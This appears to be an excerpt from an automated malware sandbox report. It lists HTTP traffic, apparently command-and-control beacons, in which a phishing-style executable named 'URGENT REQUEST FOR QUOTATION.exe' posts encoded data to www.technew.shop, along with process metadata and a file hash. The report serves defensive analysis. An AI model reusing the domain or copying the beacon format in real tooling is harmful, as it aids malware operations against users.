                                                                                                                    Nov 2, 2024 20:01:42.919641018 CET1236INData Raw: 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62
                                                                                                                    Data Ascii: dy><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASUR
                                                                                                                    Nov 2, 2024 20:01:42.919651985 CET1236INData Raw: 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63
                                                                                                                    Data Ascii: WG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6w
                                                                                                                    Nov 2, 2024 20:01:42.919828892 CET1236INData Raw: 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38 64 7a 79 6a 6b 32 49 61 42 4b 41 4e 73 69 33 38 36
                                                                                                                    Data Ascii: 1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZ
                                                                                                                    Nov 2, 2024 20:01:42.919863939 CET688INData Raw: 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a 32 52 76 5a 4b 52 66 5a 6f 73 6e 50 6b 73 6a 5a 6e
                                                                                                                    Data Ascii: dyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+TH
                                                                                                                    Nov 2, 2024 20:01:42.920526981 CET1236INData Raw: 37 6b 71 32 49 48 34 37 72 4f 4a 4d 47 36 59 61 41 4d 74 6f 65 4b 73 33 6d 6c 61 73 64 49 35 41 4f 62 62 61 46 53 55 70 47 42 7a 4c 41 5a 67 74 68 79 57 68 6b 4b 72 52 48 70 7a 48 4b 59 65 31 2b 75 68 4d 6f 63 78 6e 52 64 5a 59 65 48 4a 68 4d 4d
                                                                                                                    Data Ascii: 7kq2IH47rOJMG6YaAMtoeKs3mlasdI5AObbaFSUpGBzLAZgthyWhkKrRHpzHKYe1+uhMocxnRdZYeHJhMMFm9RVKFiWWCZ63mb4Dxqw4cfWMWbS+zh4u1PkIHNHRl2tO+Brdmk8FoGRtbAmLiv1Ogd0/mn4hkUYABiW2VsaarTwxeTr7LG4MGNtvw1QNtRDed/WODIGj07balBgrUzUoKBtygG9RiFBQjedJZOXJyUVVHbKJww6
                                                                                                                    Nov 2, 2024 20:01:42.920543909 CET1236INData Raw: 6b 41 48 47 6e 59 43 66 31 6e 61 46 5a 34 59 6b 4e 74 33 34 6e 35 34 53 47 6f 78 36 6a 63 47 6f 62 32 59 77 36 73 63 43 32 41 68 5a 4d 50 4a 72 79 4a 70 69 56 51 43 6f 66 4c 57 71 33 77 62 57 71 31 4b 78 37 36 4b 74 46 2f 64 65 54 54 77 4b 58 38
                                                                                                                    Data Ascii: kAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJryJpiVQCofLWq3wbWq1Kx76KtF/deTTwKX80dJEobwfAGNH+F7yjB4TWsXKt507mUO/NOvDd/172stDGBGt3yz48bF044+FtUKa1PR564/AUpNQCaARgNYDuAGINRP9Ng1NsKgPxXwxizWU0l22zpuHvw2FxYxV1FGuWYLwV5qcoyhkKjpAk492rtCXPxetPxANk
                                                                                                                    Nov 2, 2024 20:01:42.920552969 CET424INData Raw: 44 76 33 70 7a 4a 51 75 75 4a 50 53 45 77 77 50 54 35 74 39 76 5a 71 31 71 64 51 30 6e 69 50 36 55 78 71 47 41 65 41 34 75 68 78 61 70 66 6c 42 2b 4f 6e 73 54 51 65 42 66 33 48 36 6b 38 47 6f 39 7a 55 59 39 52 38 67 62 79 6b 48 77 43 44 59 63 46
                                                                                                                    Data Ascii: Dv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeS
                                                                                                                    Nov 2, 2024 20:01:42.920705080 CET1236INData Raw: 46 37 32 45 71 35 59 36 45 4c 41 77 37 39 68 69 74 69 6a 4f 71 55 77 4c 70 78 31 57 72 33 72 68 2b 77 46 73 49 77 44 33 73 6c 4f 2f 4f 76 6a 5a 54 30 32 4f 4a 46 7a 75 6a 48 79 42 63 69 71 4f 66 37 46 57 70 56 72 6e 35 35 36 49 37 56 53 57 34 38
                                                                                                                    Data Ascii: F72Eq5Y6ELAw79hitijOqUwLpx1Wr3rh+wFsIwD3slO/OvjZT02OJFzujHyBciqOf7FWpVrn556I7VSW48N0vDocyrYwy0NWxdxvMOoXGIz6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmB
                                                                                                                    Nov 2, 2024 20:01:42.920792103 CET1236INData Raw: 36 4a 49 74 61 35 63 64 76 72 67 4d 4a 66 31 58 67 77 71 70 2f 6b 54 34 68 55 58 47 6a 6b 52 56 37 58 49 51 6d 75 63 37 38 78 33 37 61 6d 65 78 52 70 33 46 6c 70 64 68 77 41 62 6b 6d 77 4a 5a 4a 62 48 56 75 72 4f 4c 76 6a 33 65 50 7a 62 43 4b 6f
                                                                                                                    Data Ascii: 6JIta5cdvrgMJf1Xgwqp/kT4hUXGjkRV7XIQmuc78x37amexRp3FlpdhwAbkmwJZJbHVurOLvj3ePzbCKoprCruGJ651gNZrb9e4pYOWXjj0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw
                                                                                                                    Nov 2, 2024 20:01:42.924808979 CET1236INData Raw: 2f 49 4d 7a 75 45 34 69 6d 62 48 43 70 6e 4f 61 75 31 6b 70 61 79 2f 33 58 32 69 39 6c 6e 36 2f 4a 2b 7a 49 78 58 4a 45 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58
                                                                                                                    Data Ascii: /IMzuE4imbHCpnOau1kpay/3X2i9ln6/J+zIxXJEzwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    45192.168.2.45004745.56.219.238803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:57.115925074 CET795OUTPOST /cqvc/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.technew.shop
                                                                                                                    Origin: http://www.technew.shop
                                                                                                                    Referer: http://www.technew.shop/cqvc/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 38 34 4b 57 57 76 45 76 46 4c 71 72 4b 50 76 55 76 61 45 41 37 63 42 68 77 45 6a 61 5a 54 39 57 76 66 45 70 30 6b 67 6c 49 41 6a 36 56 32 69 53 50 4f 66 30 52 5a 71 56 55 38 64 66 30 6a 2f 56 30 4d 63 72 77 46 71 4e 6c 47 31 70 43 38 4f 47 47 42 38 6d 6a 4d 44 6e 34 56 78 32 54 78 67 2f 59 72 30 50 6a 35 6f 30 54 39 57 75 6d 4c 33 37 55 4a 4d 47 69 6f 44 54 42 55 31 7a 4a 77 52 77 56 39 56 6a 69 42 6a 35 33 4b 65 34 52 2f 30 5a 64 59 7a 74 66 45 67 6f 54 45 6a 47 2f 52 43 4a 41 71 6d 6c 53 4a 54 4c 55 46 72 6a 30 2f 72 31 41 73 70 6d 69 75 70 57 7a 56 50 73 51 31 61 71 4c 51 3d 3d
                                                                                                                    Data Ascii: InQ=84KWWvEvFLqrKPvUvaEA7cBhwEjaZT9WvfEp0kglIAj6V2iSPOf0RZqVU8df0j/V0McrwFqNlG1pC8OGGB8mjMDn4Vx2Txg/Yr0Pj5o0T9WumL37UJMGioDTBU1zJwRwV9VjiBj53Ke4R/0ZdYztfEgoTEjG/RCJAqmlSJTLUFrj0/r1AspmiupWzVPsQ1aqLQ==
                                                                                                                    Nov 2, 2024 20:01:57.806106091 CET479INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:57 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 315
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    46192.168.2.45004845.56.219.238803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:59.669605017 CET815OUTPOST /cqvc/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.technew.shop
                                                                                                                    Origin: http://www.technew.shop
                                                                                                                    Referer: http://www.technew.shop/cqvc/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 38 34 4b 57 57 76 45 76 46 4c 71 72 4a 72 72 55 73 39 59 41 38 38 42 69 73 55 6a 61 58 7a 39 4e 76 66 49 70 30 68 5a 34 49 32 7a 36 56 58 53 53 4f 50 66 30 51 5a 71 56 65 63 64 61 70 54 2f 6b 30 4d 59 5a 77 45 57 4e 6c 47 68 70 43 38 2b 47 47 7a 55 6c 69 63 44 6c 79 46 78 6e 51 42 67 2f 59 72 30 50 6a 39 49 53 54 39 65 75 6e 36 6e 37 56 73 67 46 39 59 44 51 4c 30 31 7a 4e 77 52 73 56 39 55 45 69 41 2f 66 33 50 43 34 52 2b 45 5a 63 4d 6e 69 56 45 67 78 58 45 69 45 2b 54 4f 4d 4a 72 62 70 66 71 66 31 53 47 62 69 34 5a 36 76 52 64 49 78 77 75 4e 6c 75 53 47 59 64 32 6e 6a 51 57 49 6d 6d 49 76 34 65 4d 68 51 6a 39 31 46 78 58 2b 42 64 54 49 3d
                                                                                                                    Data Ascii: InQ=84KWWvEvFLqrJrrUs9YA88BisUjaXz9NvfIp0hZ4I2z6VXSSOPf0QZqVecdapT/k0MYZwEWNlGhpC8+GGzUlicDlyFxnQBg/Yr0Pj9IST9eun6n7VsgF9YDQL01zNwRsV9UEiA/f3PC4R+EZcMniVEgxXEiE+TOMJrbpfqf1SGbi4Z6vRdIxwuNluSGYd2njQWImmIv4eMhQj91FxX+BdTI=
                                                                                                                    Nov 2, 2024 20:02:00.360003948 CET479INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:02:00 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 315
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    47192.168.2.45004945.56.219.238803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:02:02.212011099 CET10897OUTPOST /cqvc/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.technew.shop
                                                                                                                    Origin: http://www.technew.shop
                                                                                                                    Referer: http://www.technew.shop/cqvc/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 38 34 4b 57 57 76 45 76 46 4c 71 72 4a 72 72 55 73 39 59 41 38 38 42 69 73 55 6a 61 58 7a 39 4e 76 66 49 70 30 68 5a 34 49 32 37 36 56 6c 61 53 49 6f 6a 30 54 5a 71 56 41 4d 64 62 70 54 2f 44 30 49 30 64 77 45 62 32 6c 44 6c 70 4e 39 65 47 41 48 41 6c 73 73 44 6c 36 6c 78 33 54 78 68 72 59 72 45 4c 6a 35 73 53 54 39 65 75 6e 35 76 37 52 35 4d 46 75 49 44 54 42 55 31 30 4a 77 52 49 56 39 39 37 69 42 4c 51 33 37 4f 34 66 39 38 5a 65 36 62 69 5a 45 67 7a 51 45 69 6d 2b 54 44 63 4a 71 33 50 66 70 44 66 53 42 72 69 34 66 37 46 4b 65 30 38 76 6f 42 57 38 54 36 38 47 58 44 75 58 48 34 44 69 4b 7a 4b 4f 4e 6c 61 73 4e 45 2b 70 46 79 6a 45 6d 4c 78 46 45 6c 43 6a 79 53 7a 32 6a 6c 59 71 31 58 76 5a 46 49 52 42 36 53 50 78 64 47 72 77 66 74 59 37 4c 78 58 73 6d 69 4d 43 47 54 56 33 56 31 53 38 74 56 55 39 48 46 46 46 6e 31 59 6e 56 6e 6b 57 53 2b 56 6c 32 56 75 69 72 66 6e 50 4b 76 50 4f 39 78 67 38 32 37 76 56 6e 55 48 5a 45 79 48 43 64 75 77 2b 4a 41 62 48 42 50 41 6e 75 56 77 71 58 4d 55 2b 55 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=84KWWvEvFLqrJrrUs9YA88BisUjaXz9NvfIp0hZ4I276VlaSIoj0TZqVAMdbpT/D0I0dwEb2lDlpN9eGAHAlssDl6lx3TxhrYrELj5sST9eun5v7R5MFuIDTBU10JwRIV997iBLQ37O4f98Ze6biZEgzQEim+TDcJq3PfpDfSBri4f7FKe08voBW8T68GXDuXH4DiKzKONlasNE+pFyjEmLxFElCjySz2jlYq1XvZFIRB6SPxdGrwftY7LxXsmiMCGTV3V1S8tVU9HFFFn1YnVnkWS+Vl2VuirfnPKvPO9xg827vVnUHZEyHCduw+JAbHBPAnuVwqXMU+U3vwVjY7q8DLH+C8TS5iQ/EeF7sqi7feKpo1/DvGmmU4Qt+GLHey/JEMpL3LOvJqK7+MtlaZYlqkU0ZpdXRa3mrSz8mPSUVAVRuDU/JvJz4+WdXLR7F1trWW0xYzoM9DmJ+Mb522eX/dnXhuCYI7PYwQVxtktO/PSpR+PKoPZWYx9tpSbV84joY+vQ4zKMYB3bFUjBaEGtqnSnJRm3hugqRtZRBh+lcX7naHeTu8N/8thuJcv92y6VHMQvSZlA7/kqkfbdm7PMHN1BCI/WScdUvXYxErVybuXX9ePesU7/7+u1XHrixoRzHflTdPshgxaAd7gEamks5uOoJlQfeOPSvFlD/7HHSDYgp0vrO3rRAiV8gSKQy2/GN5sM2Y375J2KQ/26uffGn7dDSiF8xlwuBeOZOaEcPaPo5aHqPUOE6mueNvnFfbGtBi/rBkwh8l8Mui46rsu8qLWuEFIDbvL5ih9g0z1lRsqceVfn00okNqgmyA/EwA3224uAIhT3uD0+oEvlbBdfvSw6n95uPzN2+jBpt10lWMSoS7pA0EbLQdv2bZrsdYHJ1IuGSJnx4aLWt9nelMU+btVRNuobLomzHq8GG+pwN/n7ui/X7ko6zbKdOmMAPjuPiueDxd9HzWmoRh8AbbGlfhUvOwMzEqPYd1VArx6ab0/8A [TRUNCATED]
                                                                                                                    Nov 2, 2024 20:02:02.918272972 CET479INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:02:02 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 315
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    48192.168.2.45005045.56.219.238803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:02:04.901998043 CET530OUTGET /cqvc/?4b0dM=fDYPF&InQ=x6i2VaY/COe6YJbCm7hgmslThhj3HERMoqMF/kViJh7LTEfNCvLkasLfb6R400f5ycdhyFaSyEdZONyfMQ03m7/g21IBXRRsU6NOr6wuD6OEnaTkSZEbttE= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.technew.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:02:05.834609032 CET479INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:02:05 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 315
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:14:57:58
                                                                                                                    Start date:02/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe"
                                                                                                                    Imagebase:0x30000
                                                                                                                    File size:1'594'368 bytes
                                                                                                                    MD5 hash:3E669448CC820C7782EA383DA5DFC6CD
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:14:58:11
                                                                                                                    Start date:02/11/2024
